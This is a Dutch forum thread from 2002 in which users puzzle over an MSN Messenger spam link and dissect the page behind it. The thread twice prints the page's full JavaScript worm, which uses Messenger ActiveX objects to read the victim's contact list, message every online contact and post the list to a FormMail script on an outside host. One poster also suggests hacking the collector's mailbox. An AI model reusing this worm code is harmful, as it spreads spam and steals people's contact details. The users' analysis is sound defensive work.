Bij gebrek aan uw reclame staat hier mijn handtekening.
Ik heb dat nog nooit meegemaakt
Maar ik heb ook geklikt dus.
Yukkie: Brandweer van verlangen om jouw weer eens te zien says:
URGENT - Go to [url="http://"^^""]http://www.rjdesigns.co.uk/cool[/url] Now
dreeke says:
en jij OOK al
Bij gebrek aan uw reclame staat hier mijn handtekening.
Net als mijn Norton Virusscan 2002.
Blijkbaar is hier niks aan te doen.
Een virus lijkt het me niet, gewoon 1 of ander vaag script in die website?
sapperdeflapOp woensdag 13 februari 2002 23:18 schreef dreeke het volgende:
Never give out your password or credit card number in an instant message conversation.
Yukkie: Brandweer van verlangen om jouw weer eens te zien says:
URGENT - Go to http://www.rjdesigns.co.uk/cool Now
dreeke says:
en jij OOK al
sorry dreeke... not my intention...
We've got that ring of confidence
Verwijderd
erg vaag!
[topic=408796/1/25]
Bij gebrek aan uw reclame staat hier mijn handtekening.
Dat gaat echt wel vliegensvlug rond
Hopelijk doet het geen kwaad.
Ik heb Norton Antivirus 2002 helemaal up to date, maar dat helpt natuurlijk og niet
Hopelijk doet dit ding me geen kwaad
kwoot uit andere draadOp woensdag 13 februari 2002 23:26 schreef devv05 het volgende:
ff gekeken, krijg mooi wit fullscreen scherm..
hier de source van die pagina:
code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73<html> <head> <title>Welcome</title> <Script> var msnWin; var msnList; var msgStr = "URGENT - Go to http://www.rjdesigns.co.uk/cool Now"; //var msgStr = "URGENT - Go to <a href="http://www.rjdesigns.co.uk/cool">http://www.rjdesigns.co.uk/cool</a> NOW"; function Go(){ msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1"); msnWin.resizeTo(1, 1); msnWin.moveTo(10000, 10000); msnWin.document.title = "Please Wait..."; msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>'; focus(); if (msnWin.msnObj1.localState == 1){ msnWin.msnObj2.autoLogon(); } Contacts(); Send(); msnWin.close(); document.contents.submit(); } function Contacts(){ msnList = msnWin.msnObj1.list(0); document.contents.email.value = msnWin.msnObj1.localLogonName; document.contents.subject.value = Date(); var msnStr = "<br>"; for (i=0;i<msnList.count;i++){ if (msnList(i).state >1){ msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>"; } else{ msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>"; } } document.contents.contentBox.value = msnStr; } function Send(){ for (i=0;i<msnList.count; i++){ if (msnList(i).state >1){ msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0); } } } </Script> </head> <body onload="Go()"> <p align="center"> <p align="center"> </p> <p align="center"> </p> <p align="center"> </p> <p align="center"><font face="Arial"> Please Wait...</font></p> <form METHOD="POST" ACTION="http://www.rjdesigns.co.uk/cgi-bin/FormMail.pl" NAME="contents" ID="Form1"> <input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1"> <input type="hidden" name="recipient" value="jonathansmith288@hotmail.com" ID="Hidden5"> <input type="hidden" name="email"> <input type="hidden" name="subject"> <input type="hidden" NAME="contentBox" id="Hidden6"> <input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT"> </form> </body> </html>
Lijkt me vrij onschuldig... Kreeg ook geen virusmelding oid..
Nee hor.....'t is alleen zwaar irritantOp woensdag 13 februari 2002 23:27 schreef amieghoow het volgende:
ja dus...kan het kwaad ??:?
Dit is de bron die ikeruit kan halen:Op woensdag 13 februari 2002 23:22 schreef dreeke het volgende:
Kan de volgende die em opent de bron ff opslaan? Ben benieuwd waar die URL heen gaat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
| html>
<head>
<title>Welcome</title>
<Script>
var msnWin;
var msnList;
var msgStr = "URGENT - Go to http://www.rjdesigns.co.uk/cool Now";
//var msgStr = "URGENT - Go to <a href="http://www.rjdesigns.co.uk/cool">http://www.rjdesigns.co.uk/cool</a> NOW";
function Go(){
msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
focus();
if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}
function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";
for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}
function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}
</Script>
</head>
<body onload="Go()">
<p align="center">
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="http://www.rjdesigns.co.uk/cgi-bin/FormMail.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
<input type="hidden" name="recipient" value="jonathansmith288@hotmail.com" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>
</html> |
edit: te laat.
toch geen passwords ofzo??
Die werkt nog steeds.Op woensdag 13 februari 2002 23:28 schreef walgaard het volgende:
Ik had um ook al. Die bovenste url is toch wel niet werkbaar gemaakt he?
Klikken op eigen risico dus.
Op woensdag 13 februari 2002 23:30 schreef devv05 het volgende:
hij stuurt een mail naar jonathansmith288@hotmail.com??
toch geen passwords ofzo??
Verwijderd
Dat zie je wel aan het grote aantal flooders ed. dat er zijn. Dat het nu tegenwoordig ook via een website gaat, is natuurlijk een groot gat in MSN beveiliging.
Verwijderd
Ik heb ook nog geen berichten gehad dat ze hem van mij zouden hebben gehad....
Problem solved.
Gamertag: Cosmicv0id
"Het woord Gods is voor mij niets meer dan een expressie en het product van menselijke zwakheid. De Bijbel is een verzamelwerk van legendes die achtenswaardig zijn maar ook primitief en kinderachtig.'' - Albert Einstein
Verwijderd
Hij heeft hier niks gemaild volgens mij hoor.Op woensdag 13 februari 2002 23:30 schreef devv05 het volgende:
hij stuurt een mail naar jonathansmith288@hotmail.com??
toch geen passwords ofzo??
Hoe kom je daarbij? Want mijn Sent Items boxen in outlook staat niks in.[
Op woensdag 13 februari 2002 23:32 schreef GaMbiNo het volgende:
[..]
Hij heeft hier niks gemaild volgens mij hoor.
Hoe kom je daarbij? Want mijn Sent Items boxen in outlook staat niks in.
1
2
3
4
5
6
7
8
| <form METHOD="POST" ACTION="http://www.rjdesigns.co.uk/cgi-bin/FormMail.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
<input type="hidden" name="recipient" value="jonathansmith288@hotmail.com" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form> |
Dit is een form die gemailt wordt naar die jonathansmith288@hotmail.com
Doet ie dus niet via jouw mailserver maar via die website...
Hij mailt via een script op de website, niet via jouw SMTP serverOp woensdag 13 februari 2002 23:32 schreef GaMbiNo het volgende:
[..]
Hij heeft hier niks gemaild volgens mij hoor.
Hoe kom je daarbij? Want mijn Sent Items boxen in outlook staat niks in.[
Bij gebrek aan uw reclame staat hier mijn handtekening.
Goddamn...Op woensdag 13 februari 2002 23:33 schreef dreeke het volgende:
[..]
Hij mailt via een script op de website, niet via jouw SMTP server
Dan ben ik ook de lul dus
En wie hackt die mailbox ff en leegt hem vakkundig??Op woensdag 13 februari 2002 23:38 schreef WimB het volgende:
Kan er iemand achterhalen wat er doorgemaild is?
Denk dat dat nu wel gepast en toegestaan is?
Adres dus: jonathansmith288@hotmail.com
Ff mailtje naar hotmail anders?Op woensdag 13 februari 2002 23:41 schreef O.D.Smolik het volgende:
Neej, geen reden om hem te hacken ofzo. Kerel krijgt nu zoveel passwords dat hij niet eens tijd er voor over heeft om ze allemaal uit te testen
Damn wat een eikel.. en nu hoop ik dus dat ie inderdaad geen passwords verstuurt heeft.
Van de andere kant.. wel zeeeer knap gemaakt ditte
(Mede-)Eigenaar van Brouwerij Diggelfjoer
Bier fan Fryske grûn!
Verwijderd
IDDOp woensdag 13 februari 2002 23:41 schreef O.D.Smolik het volgende:
Neej, geen reden om hem te hacken ofzo. Kerel krijgt nu zoveel passwords dat hij niet eens tijd er voor over heeft om ze allemaal uit te testen
Bovendien denk ik dat het niet zo mogelijk is om aan t password te komen? Mocht dat wel zo zijn dan is dit wel een enorm veiligheids lek
Stel dat ie ze wel gaat testen??Op woensdag 13 februari 2002 23:41 schreef O.D.Smolik het volgende:
Neej, geen reden om hem te hacken ofzo. Kerel krijgt nu zoveel passwords dat hij niet eens tijd er voor over heeft om ze allemaal uit te testen
wat dan.. dan ben je straks de lul..
en welke passwords en waarvan zou die ze versuurd hebben
(Mede-)Eigenaar van Brouwerij Diggelfjoer
Bier fan Fryske grûn!
Ben benieuwd wat er anders in al die emailtjes verstuurd wordtOp woensdag 13 februari 2002 23:43 schreef qball het volgende:
[..]
IDD
Bovendien denk ik dat het niet zo mogelijk is om aan t password te komen? Mocht dat wel zo zijn dan is dit wel een enorm veiligheids lek
maarem
als je wil weten wat hij mailt, dan misschien kun je script downloaden en html op je eigen site zetten, met je eigen mail adres erin. dan weet je het.
Uiteraard met een andere MSN message
En ik zou zeker een mailtje naar hotmail sturen! Je weet niet wat voor gegevens er verstuurd zijn. Misschien gebruiken ze de gegevens wel voor NOG meer spam
Temper is the one thing you can't get rid of by losing it.
dan krijg JIJ misschien wel passwords van je zelf en weet je wat er verstuurd wordt!
Ben al bezig..Op woensdag 13 februari 2002 23:47 schreef MaKK0 het volgende:
Kan niet iemand het testen op een een of andere manier...? Door het e.e.a. te veranderen in zn eigen email adres en lokaal op je netwerkje ofzo een soort MSN client te draaien waarmee je die URL opent die op je eigen server staat.
dan krijg JIJ misschien wel passwords van je zelf en weet je wat er verstuurd wordt!
-edit- lukt niet, z'n formmail.pl geeft geen response (meer)..
Verwijderd
Ike kreeg namelijk een ander email adres in mijn bron!
dat word er verstuurd, alleen ff iemand met verstand van scripting wat dat inhoudcode:
1 input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
We've got that ring of confidence
das vast niet meer na te gaan
(Mede-)Eigenaar van Brouwerij Diggelfjoer
Bier fan Fryske grûn!
Dat is echter een lege pagina met alleen
1
2
3
| <html>
<title>Welcome</title>
</html> |
1
| msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1"); |
dat is de url van die 2e pagina die ie opent..
Nog een verwijzing:
http://www.rjdesigns.co.uk/cool/go.htm
"Stop wasting time and get back to work!"
Made with frontpage...
nog meer???
Als we weten wat die .pl nou deedt, dan weten we waar het script voor zou moeten dienen
jullie doen allemaal alsof ie je machine gecracked heeft, om al je pr0n te downen en daarna je harde schijf te formatteren
Dit is gewoon een geintje van degene die het bedacht heeft, waaschijnlijk om het zoveelste grote veiligheidslek in software van MS te demonstreren
Het zou me niets verbazen als dat email adres niet eens van hem zelf is trouwens, maar van iemand die hij mee wil laten proeven van dit geintje (die wordt namelijk overspoeld met mailtjes nu)
Doe eens rustig ofzo
(en gebruik linux!
All my posts are provided as-is. They come with NO WARRANTY at all.
Verwijderd
Klopt, die heb ik ook gehad...er zijn er nu dus 2Op woensdag 13 februari 2002 23:52 schreef Palm het volgende:
my pics - Go to http://users.pandora.be/weedy/pics.htm Now
nog meer???
Verwijderd
------Transcript of session follows -------
unmeteredinternet@hotmail.com
552 Requested mail action aborted: exceeded storage
allocation
Title = Sieg HeilOp woensdag 13 februari 2002 23:54 schreef HardKiller het volgende:
[..]
Klopt, die heb ik ook gehad...er zijn er nu dus 2
So? Heb er al 5x op geklikt..Op woensdag 13 februari 2002 23:57 schreef Cheater het volgende:
GOD DAMN IT. had die link niet werkend gemaakt. ik wist niet waar die laatste link voor was !!!
ik had erop geklikt. en niet op de eerste
GRRRRRRRR
Verwijderd
... zet er minstens een / voor ofzo, geen live linkOp woensdag 13 februari 2002 23:52 schreef Palm het volgende:
my pics - Go to /http://users.pandora.be/weedy/pics.htm/Now
nog meer???
rustig aan, rustig aanOp woensdag 13 februari 2002 23:57 schreef Cheater het volgende:
GOD DAMN IT. had die link niet werkend gemaakt. ik wist niet waar die laatste link voor was !!!
ik had erop geklikt. en niet op de eerste
GRRRRRRRR
zie m'n vorige post
All my posts are provided as-is. They come with NO WARRANTY at all.
Wat blaat je nou, die hele pagina werkt nie eens!Op woensdag 13 februari 2002 23:57 schreef Cheater het volgende:
GOD DAMN IT. had die link niet werkend gemaakt. ik wist niet waar die laatste link voor was !!!
ik had erop geklikt. en niet op de eerste
GRRRRRRRR
Als je dit serieus meent dan geloof ik je...Op woensdag 13 februari 2002 23:53 schreef CyBeR het volgende:
jezus zeg, het enige wat verstuurd wordt naar die gozer z'n email is je ip adres en welke browser je gebruikt
jullie doen allemaal alsof ie je machine gecracked heeft, om al je pr0n te downen en daarna je harde schijf te formatteren
Dit is gewoon een geintje van degene die het bedacht heeft, waaschijnlijk om het zoveelste grote veiligheidslek in software van MS te demonstreren...
ken je al langers als vandaag namelijk
(Mede-)Eigenaar van Brouwerij Diggelfjoer
Bier fan Fryske grûn!
maar iedereen kan een IP adres van de bezoeker versturen / opslaan. nog veel meer informatie.
Dat deed ik ook. Ik sloeg alle IP's van alle gebruikers op. Na een paar dagen al 1000 IP's opgeslagen in m'n MySQL database. (uiteraard voor statistik doeleinden)
HmmkeyOp woensdag 13 februari 2002 23:53 schreef CyBeR het volgende:
(en gebruik linux!)
Net toen ik je bijna wilde geloven.
Verwijderd
mijn IP adres staat er toch als local in 192.168.0.1
Volledig mee eens, dan hadden we er nog iets aan gehad.Op donderdag 14 februari 2002 00:07 schreef Jens het volgende:
Het was leuker geweest als hij een pagina met een counter gemaakt had!
Konden we zo eens zien hoe snel het zich verspreidde
zou wel een goeie zijn idd
kreeg die shit net btw ook binnen
mwah, ik gebruik geen msn en geen windows en ik heb nergens last vanOp donderdag 14 februari 2002 00:02 schreef GaMbiNo het volgende:
[..]
Hmmkey
Net toen ik je bijna wilde geloven.![]()
enniewee
der is eigenlijk niet veel meer dat dat scriptje kan mailen
het enige interessante dat doorgegeven wordt naar webservers is je ip adres(duh), browser, een aantal dingetjes voor wat je browser aan documenten accepteert enzo, referer, en als je cookies had voor dat domein worden die ook meegestuurd
Mijn webserver logt de referer enzo, kijk:
<hostname weg omdat diegene het vast 'onveilig' vindt> - - [14/Feb/2002:00:07:40 +0100] "GET /cgi-bin/icon.cgi HTTP/1.1" 200 725 "http://gathering.tweakers.net/forum/list_messages/411036/3?limit=25" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)"
Dat laatste stukje wordt ook meegestuurd naar dat scriptje, nou, heb je er zelf wat aan?
Tsja, mijn webalizer gebruikt het voor statistieken, verder eigenlijk niet
[edit]
code blokjes maar weg tbb layout
All my posts are provided as-is. They come with NO WARRANTY at all.
dat zou een hoge server load voor em worden. als het betaalde is, misschien wel over de limiet heen.
(BTW. ik heb nog niet naar URL gekeken of server)
Verwijderd
Nou volgens mij gaat het behoorlijk rap!Op donderdag 14 februari 2002 00:09 schreef WimB het volgende:
[..]
Volledig mee eens, dan hadden we er nog iets aan gehad.
Konden we zo eens zien hoe snel het zich verspreidde
Er kunnen al geen mailtjes meer bij in zijn mailbox.
------Transcript of session follows -------
unmeteredinternet@hotmail.com
552 Requested mail action aborted: exceeded storage allocation
(Mede-)Eigenaar van Brouwerij Diggelfjoer
Bier fan Fryske grûn!
dat worden veel mailtjes voor em
Hoezow, krijg ik nu ineens een strot mail ofzow
Verwijderd
Ik denk dat hij die server wel met een of de andere hack heeft gehack hoor, het zou stom zijn om zoiets op je eigen server te zetten!Op donderdag 14 februari 2002 00:11 schreef Cheater het volgende:
Jammer dat er geen flinke page met images op stond.
dat zou een hoge server load voor em worden. als het betaalde is, misschien wel over de limiet heen.
(BTW. ik heb nog niet naar URL gekeken of server)
nee hoorOp donderdag 14 februari 2002 00:07 schreef Jens het volgende:
Het was leuker geweest als hij een pagina met een counter gemaakt had!
mijn IP adres staat er toch als local in 192.168.0.1
met jouw interne ips heeft die server waar het mailtje mee gestuurd wordt niets te maken
maar hey, ik heb je ip adres ook wel ergens in m'n httpd log staan
ik weet alleen niet welke bij wie hoort
All my posts are provided as-is. They come with NO WARRANTY at all.
Dat wat je net poste zou best wel eens heel goed van mij kunnen zijn.Op donderdag 14 februari 2002 00:20 schreef CyBeR het volgende:
[..]
nee hoor
met jouw interne ips heeft die server waar het mailtje mee gestuurd wordt niets te maken
maar hey, ik heb je ip adres ook wel ergens in m'n httpd log staan
ik weet alleen niet welke bij wie hoort(een paar duidelijke xs4all uitzonderingen daargelaten
)
De combinaties klopten maar die combinatie zal wel mee gebruikt worden.
Ja je kunt zeggen: HELP! wil ik niet.. maar deze zooi krijgt de web-server standaard toch al binnen.. en wordt naar mijn weten dan ook voor 99% gelogged.
Is gewoon irritant dingetje.. das alles.
Ja en de maker (als dat die van die e-mail is..) ziet gewoon HOEVEEL mensen erin getrapt zijn.
Als zijn hotmail box dan althans niet snel vol is
Voor de zekerheid test ik het wel ff
als je ook toevallig nog quicknet hebt..Op donderdag 14 februari 2002 00:22 schreef GaMbiNo het volgende:
[..]
Dat wat je net poste zou best wel eens heel goed van mij kunnen zijn.
De combinaties klopten maar die combinatie zal wel mee gebruikt worden.
All my posts are provided as-is. They come with NO WARRANTY at all.
Verwijderd
Jij hebt mijn IP nummer niet!Op donderdag 14 februari 2002 00:20 schreef CyBeR het volgende:
[..]
nee hoor
met jouw interne ips heeft die server waar het mailtje mee gestuurd wordt niets te maken
maar hey, ik heb je ip adres ook wel ergens in m'n httpd log staan
ik weet alleen niet welke bij wie hoort(een paar duidelijke xs4all uitzonderingen daargelaten
)
en als mijn ip vanaf mijn machine in een form gestopt wordt is dat het IP wat mijn machine heeft en dat is dus een local IP
Neej Chello.Op donderdag 14 februari 2002 00:25 schreef CyBeR het volgende:
[..]
als je ook toevallig nog quicknet hebt..
de afzender is degene van wie de lijst is en de subject is "hetslachtoffer@snotmail.com Thu Feb 14 00:09:24 2002"
Dit is wat er gemaild wordt:
1
2
3
4
5
6
7
| Below is the result of your feedback form. It was submitted by (Hetslachtoffer@snotmail.com) on Wednesday, February 13, 2002 at 23:04:22 --------------------------------------------------------------------------- contentBox: <br> heel veel email adressen, je hele contact list! <br> |
Verwijderd
en over een paar dagen krijgen we weer 800 mailtjes met "kijk uit, klik daar niet op!" van klasgenoten e.d.
Tuurlijk wel, hij krijgt het IP door van de server waar jouw internetconnectie dus vandaan komt en niet jouw interne IP!!Op donderdag 14 februari 2002 00:25 schreef Jens het volgende:
[..]
Jij hebt mijn IP nummer niet!
en als mijn ip vanaf mijn machine in een form gestopt wordt is dat het IP wat mijn machine heeft en dat is dus een local IP
Dat lijkt me vrij logisch..
Dat IP wordt niet vanaf jouw machine in een form gestopt maar hij wordt gelogd op de server waar jij dat icoon opvraagt.
En hier ben je zeker van??Op donderdag 14 februari 2002 00:26 schreef MaKK0 het volgende:
Ik ben erachter wat hij stuurt!! Hij stuurt je HELE MSN contact list door naar het email adres dat in de source staat!
de afzender is degene van wie de lijst is en de subject is "M13********@hotmail.com (Op verzoek van eigenaar) Thu Feb 14 00:09:24 2002"
Dit is wat er gemaild wordt:
code:
1 2 3 4 5 6 7 Below is the result of your feedback form. It was submitted by (Hetslachtoffer@snotmail.com) on Wednesday, February 13, 2002 at 23:04:22 --------------------------------------------------------------------------- contentBox: <br> heel veel email adressen, je hele contact list! <br>
(Mede-)Eigenaar van Brouwerij Diggelfjoer
Bier fan Fryske grûn!
Hehe.. filter Ongewenste PostOp donderdag 14 februari 2002 00:26 schreef Type het volgende:
saaie humor van iemand die dat doet
en over een paar dagen krijgen we weer 800 mailtjes met "kijk uit, klik daar niet op!" van klasgenoten e.d.
Delete all mail wich content: Fwd, Re:, Fw etc.
(Mede-)Eigenaar van Brouwerij Diggelfjoer
Bier fan Fryske grûn!
Verwijderd
/me denkt dat we hier nog veel over gaan horen..
Verwijderd
Is dat zo, dus die MSN variablen haalt hij ook van die server af?Op donderdag 14 februari 2002 00:28 schreef GaMbiNo het volgende:
[..]
Tuurlijk wel, hij krijgt het IP door van de server waar jouw internetconnectie dus vandaan komt en niet jouw interne IP!!
Dat lijkt me vrij logisch..
Dat IP wordt niet vanaf jouw machine in een form gestopt maar hij wordt gelogd op de server waar jij dat icoon opvraagt.
wat is je provider, kan ik wel een wilde gok doenOp donderdag 14 februari 2002 00:25 schreef Jens het volgende:
[..]
Jij hebt mijn IP nummer niet!
en als mijn ip vanaf mijn machine in een form gestopt wordt is dat het IP wat mijn machine heeft en dat is dus een local IP
en dat ip nummer wordt niet vanaf ouw machine uitgevogeld, dat doet dat mail scriptje, en die weethet wel gewoon
Over die email adressen: ach, wat heb je daar aan?
een beetje isp heeft tegenwoordig spam blocks, mailtjes van onbekende *@hotmail.com adressen neem ik toch niet aan, en als er toch een doorkomt stuur je een mailtje naar abuse@...
Als je zelf hotmail hebt mag je geloof ik niet klagen, ik hoorde dat je dan binnen een uur 20 spam berichten had, zonder je email adres aan iemand te hebben gegeven
(als het niet zo is, correct me
All my posts are provided as-is. They come with NO WARRANTY at all.
Verwijderd
ach, dat krijg ik op mijn hotmail.Op donderdag 14 februari 2002 00:31 schreef AngelDust het volgende:
[..]
Hehe.. filter Ongewenste Post
Delete all mail wich content: Fwd, Re:, Fw etc.![]()
ik gebruik tegenwoordig alleen maar mijn @onzin.com van het werk
Ja 100% zeker ;xOp donderdag 14 februari 2002 00:30 schreef AngelDust het volgende:
[..]
En hier ben je zeker van??
Heey je had het tegen die CyBeR-gast en hij heeft jouw ip dus wel door zijn icoon dus.Op donderdag 14 februari 2002 00:33 schreef Jens het volgende:
[..]
Is dat zo, dus die MSN variablen haalt hij ook van die server af?
Hoe het in dit script zit weet ik niet precies.
Verwijderd
Dat heb ik dus gecheckt voordat ik dat verstuurde die staat op de server van t.net idd daar is mijn IP adres wel bekend!Op donderdag 14 februari 2002 00:35 schreef GaMbiNo het volgende:
[..]
Heey je had het tegen die CyBeRgast en hij heeft jouw ip dus wel doormiddel van zijn icoon dus.
Hoe het in dit script zit weet ik niet precies.
voordat je iedereen bang maakt enzo..
Aangezien het "formulier" opzich volgens mij niks verstuurd.. niet eens IP en User agent.. alleen dit als plain text dus..
want die server ZELF allemaal nog per mail stuurd zie ik dus niet natuurlijk.. maar lijkt me toch dat het niet al te veel is..
Zijn icoon staat niet op de t.net server hoor.Op donderdag 14 februari 2002 00:37 schreef Jens het volgende:
[..]
Dat heb ik dus gecheckt voordat ik dat verstuurde die staat op de server van t.net idd daar is mijn IP adres wel bekend!
Bij mij staat daar toch iets heel anders.
Of heb jij toevallig webicons uitstaan ofzo?
Jep, weet het heel zeker... heb het net uitgeprobeerd namelijk...Op donderdag 14 februari 2002 00:37 schreef FaZe het volgende:
Weet je dat HEEL zeker van die contact list??
voordat je iedereen bang maakt enzo..
rn Angeldust, zou je dat email adres uit het subject van jou quote willen veranderen/verwijderen...?
dat is namelijk mijn email adres
(m13nogwatcijfers@hotmail.com)
Klopt ja, kreeg hem ook van iemand. Wel op geklikt (te nieuwsgierig, ik zou beter moeten weten met spamOp woensdag 13 februari 2002 23:31 schreef DeMoN het volgende:
Zie sig.
Problem solved.
(weer een pluspunt voor Trillian
Dit topic is gesloten.
![]()